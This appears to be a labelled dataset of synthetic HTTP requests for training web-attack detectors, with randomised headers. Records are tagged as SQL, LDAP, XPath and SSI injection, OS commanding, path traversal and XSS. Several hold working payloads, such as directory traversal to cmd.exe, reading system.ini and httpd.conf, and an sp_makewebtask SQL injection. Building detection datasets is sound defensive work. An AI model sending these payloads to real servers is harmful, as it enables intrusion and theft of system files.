Accept-Encoding: compress, deflate, compress, gzip, compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 53.157.57.90
Cookie: nb0d=/etc/httpd/httpd.conf
Cookie2: $Version="12"
Date: Sun, 23 May 04 04:47:50 CET
ETag: "71ODRP94enHFvSy.T"
Expect: 100-continue
From: h8va@2gctni.it
If-Modified-Since: Tue, 20 Jan 04 04:22:21 CET
If-Unmodified-Since: Wed, 04 Nov 09 01:13:53 UTC
If-Match: *
If-None-Match: *
If-Range: "x2fMWqTymyygz9E"
Max-Forwards: 714
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: be1hrk yaoU7=aypDnr7
Authorization: Basic d3NsYWE2czpFYWRlZQ==
Range: 6852-5193,8321-23318
Referer: http://www.mrcht.fr/Fid4.jsp
TE: trailers,trailers
Trailer: Date
User-Agent: ADfRgeyousgatirga
UA-CPU: StrongARM
UA-Disp: 739,8713,16
UA-Color: color8
UA-Pixels: 409x6935
Via: 2.5 213.83.255.188
Transfer-Encoding: identity
Upgrade: leehiz/2.0, yskn/5.1
Warning: 116 www.resobEh.jpeg:51327 "etnastlc5" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lnntmxnn9E=iil7trIo&0nw119etDgeYt1=~&p1c=pbK5gHbPwse&elhnld=sotnriceEerse0wh&e3=172&pH.78=pd5hdeoL&B1ertbh=2&kkptlii=m1ce9Styh&iolskNntatt=83Pt&2ieihuaTaiIr3cs=u

End - Id: 46456
Start - Id: 41333
class: SqlInjection
GET /xIDdp@detL/tw_binJHTs37upqa2/rsesfelna6txr/U2lTThjOLIboZN/eueDRp5Z1UVi/ro/HGprocessing-instructionphtacces/lazZesz/fnsiNmeOepkcaeqhdier/oten/FLiframelsstyleYs-/doaasthbihbrfns.jpeg? HTTP/1.1
Host: 8.11.155.113
Connection: nsla
Accept: video/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: dtrnpL-2ag;q=0.5, esF7t5ip-na4;q=0.1, m-g, ecfta5Up-rhyabdt5;q=0.9
Cache-Control: no-cache
Client-ip: 231.141.75.99
Cookie: scrlrkeiet='  or  id   in   ( select   *     from   user_db   );sh=Es+&x
Cookie2: $Version="2"
Date: Wed, 30 May 07 10:00:30 CET
ETag: W/"bTaD@2l3FtQ@8bb1t2"
Expect: 100-continue
From: 1eqhnuaw@aenh.gov
If-Modified-Since: Sun, 08 Jul 07 15:08:53 UTC
If-Unmodified-Since: Wed, 21 Dec 05 20:53:29 CET
If-Match: *
If-Range: Sat, 13 Sep 08 10:35:20 GMT
Max-Forwards: 76
Authorization: NTLM d3RocW5ubWdqY3RpZGh0Y1dlc29lZHhoZTFnYUVpemJhb2VmZW9laVNiNXhoNg==
Range: -998169,50014-
Referer: http://sbeac.gov/4iaamd/syelg9i/etn3est/lwrb5.pl
TE: gzip,trailers,trailers
Trailer: Max-Forwards
User-Agent: ttfre (rHnBp@0Xuo)
UA-CPU: Sparc
UA-Color: color16
Via: HTTP/2.8 www.elfq.tiff
Transfer-Encoding: gzip
Upgrade: yooe/1.9, ttscae/8.6, sldtl/1.3, 6ene/2.0
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41333
Start - Id: 39342
class: SSI
GET /MkpW.@.a6TWPopt/G5dtub65/eAooNseosrDve.msf?cwFzrt=9812507&hwice=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.MRrLbeAu.be
Connection: laoRrgE
Accept: application/postscript;q=0.4, audio/*;q=0.8
Accept-Charset: euc-tw, windows-1251, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 153.213.53.71
Cookie: Bu8BQt3H=sn6lqhadauene9
Cookie2: $Version="74"
Date: Sun, 31 Jul 05 15:47:49 GMT
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Wed, 12 Jan 05 06:07:25 UTC
If-Unmodified-Since: Fri, 25 Jul 08 02:55:54 GMT
If-Match: *
If-None-Match: "PlU6Bt9Elc9ytKed"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 04
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic anRodzppdXlvZDE=
Range: 422767-,0924-,61697-47592
Referer: http://www.aos1ee.de/gftr.exe
TE: chunked;q=0.7
Trailer: Connection
User-Agent: Mozilla/2.9 (compatible; ieTlA; Mac OS X; thrslr)
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 3.9 214.136.100.79, 8.6 www.ad8lT.tiff:45
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39342
Start - Id: 37017
class: LdapInjection
GET /onn/bky1/tlgirltptsilE/telnetTXYl0dGKj/eOnfntmloe/tnO8n6ki5msaaA2asorh/pdIustomwa76/nm/metaa/lseerir6dagOnbetfs.js?RlL5=vyn&F0q7@fKqy=nZ13k9XttBBh&e1ahea00ah9=sesvaqshtnt5gtE&wt6j8=noqClJMkckw&tnesereduanotet=542225&jrp=bmR&rat0dHii=ny2N5F%40Ij&a3m=rlT1Nvarp8dYzn9%2F9+&ajhD7ideb=8&nisrrNe6pho=%29++++%28++++%7C+%280vnt%3DEtia*%29 HTTP/1.0
Host: 8.97.201.212:95598
Connection: keep-alive
Accept: video/*;q=0.3, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.8, identity;q=0.9, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 96.238.108.221
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="80"
Date: Sun, 01 Feb 04 15:35:15 UTC
ETag: W/"NrDtJo599z-_lb2P"
Expect: 100-continue
From: B3nrc@Ecode1.gov
If-Modified-Since: Tue, 24 Aug 04 11:09:51 CET
If-Unmodified-Since: Thu, 27 Apr 06 14:55:32 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 61
MIME-Version: 2.2
Pragma: ubwtTo=tn7a
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic b2xlUkNzOmV5c29jcg==
Range: 00177-,0-7679,-82265
Referer: /TfilaAa/eBoh/9ymmrht/rb1GO/dtPtw4os.cgi
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/2.0 (Windows; U; Win98 2.2; lT-tj; rv:7.5.9) Gecko/92042548
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 7.7 www.dncf.html, 4.5 www.iy3rs.tiff:20, 3.9 155.57.126.158:412
Transfer-Encoding: tvtacS
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37017
Start - Id: 44387
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.2haodoee.com
Connection: ni3lnree
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.4, macintosh, us-ascii;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Wed, 02 Feb 05 19:32:53 CET
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Tue, 16 Jan 07 18:40:37 CET
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Apr 10 24:21:18 CET
Max-Forwards: 770
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic cEtpc3BlZG86aXVnU25z
Range: -843519
Referer: http://Eett.fr/81kpjh/iohEippi/5slmtdeE/b1o06het.php3
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (compatible; stoseeta; Win 9x; 5e4aTir; eungyEsnwl)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: oIjrij/9.0 25.54.228.52
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44387
Start - Id: 43457
class: OsCommanding
GET /re1nngj7Avo/nleggmefal/st_9q.jsp?tt=561936&odeiaDmrys=i2z&7w7bitbreorp4=%2Fperl++++%2Ftmp%2Fge.pl+++++-p5055&4e=944&8r7ijd8=94560&CYEhtaccesxmlLdWD=wMqHKgTzo HTTP/1.0
Host: 57.41.76.159
Connection: keep-alive
Accept: application/*
Accept-Charset: utf-7;q=0.3, big5;q=0.6, shift_jis, x-mac-greek, utf-7;q=0.0
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 21.205.240.147
Cookie2: $Version="3"
Date: Wed, 14 Nov 07 08:51:30 CET
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: eyoysok=loAtbao;itlSdbr=twhtgdmq
From: ictt@eelonuT.ch
If-Modified-Since: Wed, 23 Jul 08 16:11:45 CET
If-Range: Sat, 07 Apr 07 02:56:25 GMT
Max-Forwards: 4
MIME-Version: 2.3
Pragma: no-cache
Authorization: Digest realm
Referer: /iiic/sa7o8/0oeb/ieoaldeX/hluukcF.tiff
TE: trailers,trailers,trailers
User-Agent: t5dud (r08RGEltff)
UA-Pixels: 5209x0173
Transfer-Encoding: gzip
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43457
Start - Id: 45692
class: PathTransversal
GET /nFvvNlkkBsellHfcLOx/slhZ0Ef-luW/ie7/lGkvJI/dKkRYxmTeN/jbdlUI.O6.q/a2afASf/rH/aEftadAyahgnnsTth/nyaamoerlItnoe.exe?tN7DJ=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&etstgpqett=+i&d6edrth=2&tcb2a=dtf&roSnaeG=w19I&eer2onn5cbdguwC=ejahlCooONa&wi=atgesburesSb HTTP/1.1
Host: 37.94.86.114
Connection: ie3s
Accept: application/*, video/quicktime, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: min-fresh=0506
Client-ip: 24.162.161.227
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="2"
Date: Wed, 26 Oct 05 13:57:39 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: 100-continue
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 10 Jun 05 04:46:25 CET
If-Match: *
If-None-Match: *
If-Range: "uI3J2d3rGW5NAp2fMVa-"
Max-Forwards: 719
MIME-Version: 5.2
Pragma: stz='y'
Proxy-Authorization: Digest nc=dFd20C70
Authorization: NTLM Y3ZjZWhsZGVhdWNoZWVhYWFzZjNwb1hpZXdqbGVsM2lhZUN0bmZUZXJpYXAyeTE=
Range: -934,-807,-703421
Referer: http://inny.fr/am7wi/Olecih/3Aaf/oauIr.png
TE: trailers,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (compatible; i51a; Linux i386; rs1tsdhoh)
UA-CPU: Sparc
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: HTTP/1.3 www.eapop.jpg:65, mc3/1.1 157.220.38.46, 1.6 www.tna7l.gif
Transfer-Encoding: hoqhie; wditeOI=otaUq
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45692
Start - Id: 48685
class: XPathInjection
PUT /bcb6styasnoianEy8m.sh? HTTP/1.0
Content-Length: 175
Content-Language: hw4
Content-Encoding: deflate
Content-Location: /4yt0euea/apes/t1aiuY/n0ucgt.wav
Content-MD5: YWVsdllmeWh0OHJUblJkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: www.3etiu.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: nreHlY-ehhg
Cache-Control: no-cache
Client-ip: 187.92.28.4
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Fri, 01 May 09 23:42:42 UTC
ETag: W/"Z13fAUsM8R8Bav-Kl"
Expect: oIwoedct
If-Modified-Since: Sat, 24 Oct 09 12:42:47 CET
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: "f4@RrdbWzpGbtLPDUT"
If-None-Match: "PyBLLl@cUd9evHyRy"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 4484
Pragma: O64=uhud
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Referer: /e6ja/EhxptVba/7owe/yioe.jsp
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 3.6; p5-Mr; rv:5.6.5) Gecko/22325787
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: deflate
Upgrade: ereeos/7.6, tgr/8.5, 4idl/4.6, oth/2.8, Gpir/5.3
X-Serial-Number: 3185085450816900238

oobrbza=qOce&tddblsaiwnssm=2873   or 1<   eueoYn/qinul/I0c3/child::text()[position()=2]  or     1955='] | /* | /foo[bar='&elc=i7r

End - Id: 48685
Start - Id: 36888
class: LdapInjection
GET /eiITrrrNiss/uatdfas9rcAt/3.PLDDvBwXt2n4K7wO/i82ikJu3cwpcZl1mMlA/by3Q/hU2RCeshAU3A/udXH5SzUpIAR7xiuV/skshbR9k/ivhedaiitmhxsnmmt6.jpg?JRNWcW@.=okseotall&elinkmwindow.open0T=hqGx3d&loI2omkpe0dsefa=aupdate%25&cutte8a4nd=%3CerdoU%25a1as+formsCyOsxu&aRieaE0=678&bonivo35Ry7=m0f9a&S3XNPhsam=57&dnnt=0dt&hfsh=53&edeok8lh=tisdoemsp&sHan4nLurd=++te%2FeoE&mctuenapxew0se=hatn%3E&gwesoreko=aspsrn&Aw0AGAnKQ=tlwtankqO HTTP/1.1
Host: 96.102.244.254
Connection: eedtl
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 190.47.115.152
Cookie: dnNyepZna=4;ed=006;orjmeta=ta7;addrjhiRar=")(targetfilter=(o=NetscapeRoot));phBhetdwide=571;Torbx0ei=fo3et@eechoh
Cookie2: $Version="571"
Date: Sat, 22 Nov 08 04:43:38 GMT
ETag: W/"B_y8d@B5PKylTMfw2"
Expect: 100-continue
From: otdtT5@ood5yg.fr
If-Modified-Since: Tue, 26 Jun 07 14:59:00 UTC
If-Unmodified-Since: Tue, 04 Jul 06 07:37:26 CET
If-Match: "hyPKVsh6xUkQcitBQLJk"
If-None-Match: *
If-Range: Tue, 04 Aug 09 04:34:07 UTC
Max-Forwards: 3533
MIME-Version: 9.8
Pragma: tuEt4rrt='0chui'
Proxy-Authorization: Basic QWVJcmFoOjhsZDd0OQ==
Authorization: ohyd 1cjloct=ceaae5gy
Range: 138-
Referer: http://ezaEly8f.be/cheteenh/5Shrtoo/tnwyoos.php4
TE: gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (compatible; Konqueror/8.5; SunOS sun4u; awnfit; entrmtyssB)
UA-CPU: MIPS
UA-Disp: 5898,6177,16
UA-OS: Windows NT
UA-Pixels: 755x6863
Via: 4.2 58.101.141.186:369
Transfer-Encoding: compress
Warning: 131 www.eea2mn.jpeg "ygsearuoIlRigensha" "Sat, 23 Dec 06 15:37:17 UTC"
X-Serial-Number: 441224471064732
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36888
Start - Id: 46706
class: XSS
GET /03FohomejR/oV.cgi?m4doOeAes0a=44989162&o2e=rmoteGosn&dor=disEbdi6t3broSmdue&eeen6dhsamSp=inP12&fqbsa8eeTS=743919 HTTP/1.1
Host: www.teaABze.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 148.68.136.140
Cookie: cEaq=789280;ooczea3ksxRj=<script>alert(ohpsmtI.tuii)</script   >
Cookie2: $Version="856"
Date: Sun, 22 May 05 07:52:50 CET
ETag: W/"@Cb2dnAruCPukJ7."
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Fri, 19 Mar 10 06:09:44 GMT
If-Unmodified-Since: Tue, 13 Sep 05 24:38:36 CET
If-Match: "_HU-2ifK3TXwH-sR@4Uo"
If-None-Match: "vYtd6PYsdu3duWk-jV"
If-Range: Tue, 13 Apr 10 11:36:16 CET
Max-Forwards: 4682
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic c2Fob2lrZDpldHQwcmx1ZQ==
Authorization: pkemAl oAhpr=metcuien
Range: -6,920-
Referer: /sZotamn6/denuw.jsp
TE: chunked;q=0.6,deflate;q=0.9,trailers
Trailer: From
User-Agent: Mozilla/2.4 (compatible; hinturSdyu; Open BSD i586; cal0r; UIuszw; gavateEw)
UA-CPU: Sparc
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 450x131
Via: uoat1/1.6 247.165.240.168, 9.8 139.220.211.2
Transfer-Encoding: reelnr
Upgrade: jolA/9.7, sctItf/5.4, eTkD/8.1, hatAd/2.3
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 183.144.127.62
X-Serial-Number: 24725262315078744174
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46706
Start - Id: 41031
class: SqlInjection
GET /t3Nl91VN3cM5zNLv.HSn/lpksRe2siiheeou8R.tiff?Thintt=436&@nwiframexP=40102&8it4aqgAy7ly=5509949838&ct5nhlr=wbv&OinputWlibf03RJz=%7Ei&tpRiton3=9747705&ZS8ZuEP_xXZselect=76797532&tHhcsea=T%5DynWeetc%3Csdsoesl%7C&nsbhfsgl=5&Awnez=thnqdxea&logeidERBmGHdJ=%27%3B++EXEC++master.dbo.sp_makewebtask++%27c%3A%5Cinetpub%5Cwwwroot%5CtlorhcoT.jpg%27%2C+++++%27SELECT++3neiuzet+++FROM++++tp+++WHERE+++xtype%3D%27%27U%27%27%27&O6KZg7Vdmof=r2eh&4su=5yRSmixfb HTTP/1.0
Host: www.mhbTinrvFe.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: am-aMTrso;q=0.5, BoNI-1
Cache-Control: rxcOscn0=sn
Client-ip: 55.129.155.218
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="1"
Date: Tue, 15 Aug 06 03:10:18 GMT
ETag: "DBTKzrNI5ravG@LB-7a"
Expect: yuEtt
From: a1tlic@rsdn.ch
If-Modified-Since: Fri, 18 May 07 12:26:36 GMT
If-Unmodified-Since: Tue, 23 Nov 04 05:32:03 CET
If-Match: *
If-None-Match: "tS3J7iTdpmWctn6"
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 7202
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 770-,-93926
Referer: http://neoN2c.fr/sac1/rsrowee/rsdw/nlea/EwabN.js
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/4.5 (Windows; U; Win98 0.7; is-1i; rv:2.9.5) Gecko/47153128
UA-CPU: 68000
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: dlbsd/2.7 45.187.138.214
Transfer-Encoding: rthw; Af3o=aieEsn
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 757 www.ISNmy.shtml "drueynihhx3tslbrems" "Tue, 22 Sep 09 13:07:10 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41031
Start - Id: 49193
class: XPathInjection
GET /hpaxLlaoolyared/2S/gVL/QngAdabirysns6m/qCnWZSue6/hjWGlinkVhtpass/iDsytmlsihatser29.cgi?o5ent=zN7XZNzHKZ&ideCalenDanhn=2ineuet0%27++or+cAxp%2Ffe%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+%27Wgpo%27++++%3D+%27&1mlreees7hnnreA=leehlaDqe&btdanbr=2147&i0TurieD=eauasoba HTTP/1.1
Host: 225.4.202.140:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 181.41.86.41
Cookie: apsher2ez6aedre=et>9z6~Ai0childd];Ao=Cpslou1ee92o;foneteeaoerlHaa=O%tefeA;u5c=mOO1f;dd7window.openXOfv=82000;PREP=anar'e%or eoa
Cookie2: $Version="0"
Date: Sat, 29 Oct 05 16:00:41 GMT
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: ntcb=sredwdkt
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:35:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 78
MIME-Version: 9.1
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Basic c2VlYWVwOmVuYWp3bWpl
Range: 87-,-69535,7135-70843
Referer: /mtIrlttn/nhietn.conf
TE: chunked;q=0.7,trailers
Trailer: If-Match
User-Agent: h4BiXq_B09 http://www.enousIa.biz
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: eOokn/9.8 217.25.2.241, FTP/7.1 www.qnaotl.html, 0.2 177.164.212.217:65514
Transfer-Encoding: rnes
Upgrade: aon0s/0.1, r0iia/0.9, 2qnen/0.1, yadio/5.6, tezWs/1.2
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49193
Start - Id: 43765
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.zr6le.net
Connection: close
Accept: audio/*;q=0.9, text/xml;q=0.0, audio/x-wav;q=0.2
Accept-Charset: iso-8859-6, iso-8859-5
Accept-Encoding: compress, compress, deflate;q=0.8, deflate, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 242.53.53.65
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Wed, 26 Aug 09 08:53:37 CET
ETag: "nd9_u0ZbZtMLDe87"
Expect: wspr4ebT
From: merccs0n@HaIq3eH9x.gov
If-Modified-Since: Fri, 22 May 09 10:51:47 CET
If-Unmodified-Since: Tue, 07 Oct 08 19:59:30 UTC
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "lvJsGHir-p@K7Z1_"
If-Range: *
Max-Forwards: 33
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Basic ZGhyb0Flb2g6ZWVobGExcw==
Range: -541349,6-1
Referer: http://isemhes.st/qraiw/eoEtv.nsf
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: ihah6sf/5.0.6
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 2.6 www.mhtaO9n.gif
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 725 239.192.69.199 "oo5kiaaie" "Thu, 23 Jun 05 19:03:49 CET"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43765
Start - Id: 48312
class: XPathInjection
GET /el2TGiFuntQEMrF-3/yOZ/afDLv_/a-FsR/eeel7oa/d9F.9s36MNpi/ikqzs_sGlC/eEUgJHeI/tim7ihearcoeujhE/oT-rrRD/fOm5LUdcoeqCS_1h/tQsSNz-.EOrEm.jpg?vokauasvrten=691899&metev=56&spc5aezdtyh8=z4oayLe11hnplaf&fm=8&thhttPtaram=3730787197&tge=w0f%29rsueiui+%27o+na&ldar=fuesuTenibnsIcs&sne=li8rd6lj HTTP/1.0
Host: www.ue6gna.com
Connection: close
Accept: text/*, video/quicktime;q=0.0, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: iomw'   or   path/child::node()[position()=N]     or    'suxen3W'    = '
Cache-Control: max-stale=014
Client-ip: 160.149.221.171
Cookie: 7hco=66106309;er=31469071;9@udr-B-GAUhaving=r8w;cNh4ToS=xzOn;ijHunawj1sgunhn=7433
Cookie2: $Version="77"
Date: Sun, 11 Feb 07 08:16:03 GMT
ETag: "5iy6r8NdIpbUNk@VBE"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Tue, 27 Dec 05 19:44:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jul 05 21:15:21 CET
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: NTLM c0RsYWRuc3RkOGl0dmFsc2VhblRJc2hlYXZnVGtoZmVtZWdhYg==
Referer: http://www.adetet.org/1n1ircnI/zil9wao/NRaotob/yz6nHhi/de7i.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.3 (compatible; Konqueror/0.5; SunOS sun4u; roeie2y)
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: deflate
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48312
Start - Id: 46075
class: PathTransversal
POST /to.jsp? HTTP/1.0
Content-Length: 265
Content-Language: hst
Content-Encoding: identity
Content-Location: http://www.eotcoe.be/n2Si3sog.cgi
Content-MD5: YWRkZmxxZWFlcG50Y2NOYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 04 Jul 06 22:10:31 GMT
Host: 42.204.114.182:80
Connection: jtyl
Accept: application/rtf;q=0.5, text/*
Accept-Charset: x-mac-arabic;q=0.3, x-mac-icelandic, iso-8859-5, x-mac-roman;q=0.1
Accept-Encoding: compress, deflate;q=0.9, deflate;q=0.2, gzip
Accept-Language: tqN-daLazH
Cache-Control: min-fresh=5227
Cookie2: $Version="592"
Date: Thu, 18 May 06 10:51:13 GMT
Expect: adrwsd6=eYskhrq
If-Modified-Since: Tue, 28 Apr 09 19:11:46 GMT
